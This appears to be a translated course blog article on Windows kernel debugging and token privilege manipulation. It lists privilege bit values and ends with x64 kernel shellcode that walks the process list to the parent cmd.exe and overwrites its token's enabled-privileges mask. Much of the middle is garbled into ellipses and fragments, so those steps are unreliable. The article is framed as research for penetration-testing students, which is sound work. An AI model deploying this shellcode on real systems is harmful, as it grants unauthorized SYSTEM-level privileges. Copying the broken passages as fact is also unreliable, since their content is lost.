OTUS expert Alexander Kolesnikov shared with us an article he wrote specifically for students of the course "Pentest. Practice of Penetration Testing".
We, in turn, invite everyone to take part in a free demo lesson on the topic "Windows AD: information gathering and privilege escalation. Exploits and vulnerabilities of the last 5 years."
The previous article discussed how exploits use the token-copy (token stealing) technique to escalate privileges. This article looks at another way of modifying a token, and also tries to find out how the privileges held in the Primary Token are set.
All examples in the article are for informational purposes only. If you want to repeat the experiments, use a virtual machine, since some of the actions can damage your working machine. All experiments are performed for research purposes only.
Test bench setup
For the experiments, two virtual machines on a NAT network are enough. Two, because kernel debugging of the operating system needs a separate debug target and debugger host. NAT, so that the debugger host has Internet access and can download debug symbols; with symbols it is easier and faster to find the right structures without source code. Guides on configuring the debugger are available on the Internet, but a few lines follow on how it is done for Windows 10 1909.
1. Install the debugger. For Windows we install WinDbg Preview:
2. Put the target operating system into debug mode:
Reboot the target. On the second machine, which will host the debugger, open WinDbg:
After the reboot:
Token
Among the things the Primary Token holds are the privileges, which the kernel refers to by names with an Se* prefix, for example:
SeAssignPrimaryToken
SeAudit
SeBackup
SeChangeNotify
SeCreateToken
SeDebug
SeLoadDriver
SeLockMemory
SeManageVolume
SeRestore
SeSecurity
SeTakeOwnership
Let us look at the token of the System process (PID 4), including its “Security Descriptor”. In WinDbg the token object can be reached with:
dx @$cursession.Processes[4].KernelObject.Token
The Token field of _EPROCESS is an _EX_FAST_REF: the low four bits of the value hold a reference count and are not part of the pointer, so they have to be masked off to get the address of the _TOKEN structure. For System:
… the “Security Descriptor” … :
… BSOD. … Windows 10 1607. … BSOD, … “Security Descriptor” … :
BSOD? … :
1. … :
2. cmd.exe … :
3. … :
… Integrity Levels …
… : 0x1
BSOD … — 0x100000
The bit values of the individual privileges are:
SeDebugPrivilege - 0x100000
SeAuditPrivilege - 0x200000
SeSystemEnvironmentPrivilege - 0x400000
SeCreatePermanentPrivilege - 0x010000
SeSystemtimePrivilege - 0x001000
SeSecurityPrivilege - 0x000100
SeLockMemoryPrivilege - 0x000010
… 6 … shellcode … The privilege masks are stored in the _SEP_TOKEN_PRIVILEGES structure of the token; the mask the shellcode has to change is at _SEP_TOKEN_PRIVILEGES+0x8.
… System …
netstat -ab
… Windows … System … :
… the payload:
[BITS 64]
; Structure offsets below are for Windows 10 1909 (the test bench above).
start:
    mov r9, [gs:0x188]            ; _KPCR.Prcb.CurrentThread -> _KTHREAD of the current thread
    mov r9, [r9+0x220]            ; _KTHREAD.Process -> _EPROCESS of the current process
    mov r8, [r9+0x3e8]            ; _EPROCESS.InheritedFromUniqueProcessId (PID of the parent, cmd.exe)
    mov rax, r9
loop1:
    mov rax, [rax + 0x2f0]        ; _EPROCESS.ActiveProcessLinks.Flink -> next LIST_ENTRY in the process list
    sub rax, 0x2f0                ; back from the LIST_ENTRY to the start of that _EPROCESS
    cmp [rax + 0x2e8], r8         ; _EPROCESS.UniqueProcessId == parent PID?
    jne loop1
    mov rcx, rax                  ; rcx = _EPROCESS of cmd.exe
    add rcx, 0x360                ; _EPROCESS.Token (an _EX_FAST_REF)
    mov rax, [rcx]
    and rax, 0xFFFFFFFFFFFFFFF0   ; strip the reference count in the low 4 bits -> _TOKEN*
    mov r8, 0x1e73deff20          ; privilege mask read from the System token in the debugger
    mov [rax+0x48], r8            ; _TOKEN+0x40 = Privileges, +0x8 = Enabled: overwrite the enabled-privileges mask
    ret